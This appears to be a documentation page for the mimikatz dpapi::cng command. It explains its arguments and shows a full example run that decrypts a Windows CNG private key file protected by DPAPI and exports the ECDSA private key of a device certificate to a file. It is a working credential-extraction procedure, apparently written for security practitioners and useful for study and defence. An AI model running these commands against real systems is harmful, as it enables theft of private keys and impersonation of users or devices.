cng
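dpapi::cng decrypts a given CNG private key file. According to this document, the Crypto Next Generation (CNG) API is the successor of the Crypto API (CAPI). The private properties and the private key inside the file are stored as DPAPI blobs (the BLOB sections in the output below), so decryption depends on the DPAPI master key referenced by guidMasterKey. The command has the following command line arguments: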
  • /in: the CNG private key file. The location of the file is C:\Users\<UserName>\AppData\Roaming\Microsoft\Crypto\Keys\<key_file>
  • /password: the password used to decrypt the CNG private key file
  • /masterkey: the masterkey to use for decryption. It can be obtained through sekurlsa::dpapi.
  • /unprotect: display the decryption results on screen
mimikatz # dpapi::cng /in:"C:\Users\m3g9tr0n\AppData\Roaming\Microsoft\Crypto\Keys\de7cf8a7901d2ad13e5c67c29e5d1662_e4aad2d1-5ec0-4ea4-b259-65eda5bc47a8" /unprotect
**KEY (cng)**
dwVersion : 00000001 - 1
unk : 00000000 - 0
dwNameLen : 0000006e - 110
type : 00030004 - 196612
dwPublicPropertiesLen : 00000088 - 136
dwPrivatePropertiesLen: 000000ee - 238
dwPrivateKeyLen : 00000110 - 272
unkArray[16] : 00000000000000000000000000000000
pName : Microsoft Connected Devices Platform device certificate
pPublicProperties : 2 field(s)
**KEY CNG PROPERTY**
dwStructLen : 0000002c - 44
type : 00000000 - 0
unk : 00000000 - 0
dwNameLen : 00000010 - 16
dwPropertyLen : 00000008 - 8
pName : Modified
pProperty : 2136f8f327d6d701
​
**KEY CNG PROPERTY**
dwStructLen : 0000005c - 92
type : 0000000a - 10
unk : 00000000 - 0
dwNameLen : 00000000 - 0
dwPropertyLen : 00000048 - 72
pName :
pProperty : 45435331200000005266cba2681ed70a0576a7f8b430eb41d1c44c4891a841726808ffa0ee887a7c8f4a06ad0916f7503124549834a58a0d7e6a22fbeab527bcd527fbc1c519f9d8
​
pPrivateProperties :
**BLOB**
dwVersion : 00000001 - 1
guidProvider : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}
dwMasterKeyVersion : 00000001 - 1
guidMasterKey : {5c22983f-77ee-41e4-9086-8073d664e417}
dwFlags : 00000000 - 0 ()
dwDescriptionLen : 0000002e - 46
szDescription : Private Key Properties
algCrypt : 00006603 - 26115 (CALG_3DES)
dwAlgCryptLen : 000000c0 - 192
dwSaltLen : 00000010 - 16
pbSalt : f23b7f559bbce2b8642cc8ceb007b45d
dwHmacKeyLen : 00000000 - 0
pbHmackKey :
algHash : 00008004 - 32772 (CALG_SHA1)
dwAlgHashLen : 000000a0 - 160
dwHmac2KeyLen : 00000010 - 16
pbHmack2Key : f06062572b447d30ce57f94d8484611f
dwDataLen : 00000038 - 56
pbData : 9ab857893f8135b87f16edbc7a885a95a58b2bd19c39ad891e463d8dffefee783d680b28d2fe37e8092515baea2ca1f5bc442095012d576d
dwSignLen : 00000014 - 20
pbSign : e93adcb7cc8f659b57ccf09ed8fe51d701d6f93d
​
pPrivateKey :
**BLOB**
dwVersion : 00000001 - 1
guidProvider : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}
dwMasterKeyVersion : 00000001 - 1
guidMasterKey : {5c22983f-77ee-41e4-9086-8073d664e417}
dwFlags : 00000000 - 0 ()
dwDescriptionLen : 00000018 - 24
szDescription : Private Key
algCrypt : 00006603 - 26115 (CALG_3DES)
dwAlgCryptLen : 000000c0 - 192
dwSaltLen : 00000010 - 16
pbSalt : 858b2f4b4b0ae21d72fcc27513bfaead
dwHmacKeyLen : 00000000 - 0
pbHmackKey :
algHash : 00008004 - 32772 (CALG_SHA1)
dwAlgHashLen : 000000a0 - 160
dwHmac2KeyLen : 00000010 - 16
pbHmack2Key : 52f468f480fc4d7e6c655d9c233103d7
dwDataLen : 00000070 - 112
pbData : f4f111a0db7097371c5a05f4fd1648bf1682e2e99d7cd7d67ab2e88ab85875073d9fec779dbefba2d0f0e3d4b60f3fd53bb7c228ea7aa087a1b54e773e2e05d5982c5e8bfb4251298011c3fc19da1a0e721c9a6fbff58e1c7a74a387f0fd4bdafd856b9563bc1070cbdf714eb78d7139
dwSignLen : 00000014 - 20
pbSign : a4864f3ddaccc3f165eab44371d06584950b9fa5
​
Decrypting Private Properties:
* using CryptUnprotectData API
* volatile cache: GUID:{5c22983f-77ee-41e4-9086-8073d664e417};KeyHash:850247e2dd89c50536c05bdcee1a56c395e752cf;Key:available
1 field(s)
**KEY CNG PROPERTY**
dwStructLen : 00000032 - 50
type : 00000003 - 3
unk : 00000000 - 0
dwNameLen : 0000001a - 26
dwPropertyLen : 00000004 - 4
pName : Export Policy
pProperty : 03000000
​
Decrypting Private Key:
* using CryptUnprotectData API
* volatile cache: GUID:{5c22983f-77ee-41e4-9086-8073d664e417};KeyHash:850247e2dd89c50536c05bdcee1a56c395e752cf;Key:available
45435332200000005266cba2681ed70a0576a7f8b430eb41d1c44c4891a841726808ffa0ee887a7c8f4a06ad0916f7503124549834a58a0d7e6a22fbeab527bcd527fbc1c519f9d8a6a296d94241edf1446e255551f0d9198474bd99aab67996a9a0bfc93357337d
|Provider name : Microsoft Software Key Storage Provider
|Implementation: NCRYPT_IMPL_SOFTWARE_FLAG ;
Algorithm : ECDSA_P256
Key size : 256 (0x00000100)
Export policy : 00000003 ( NCRYPT_ALLOW_EXPORT_FLAG ; NCRYPT_ALLOW_PLAINTEXT_EXPORT_FLAG ; )
Exportable key : YES
LSA isolation : NO
Private export : OK - 'dpapi_cng_0_Microsoft Connected Devices Platform device certificate.dsa.ec.p8k'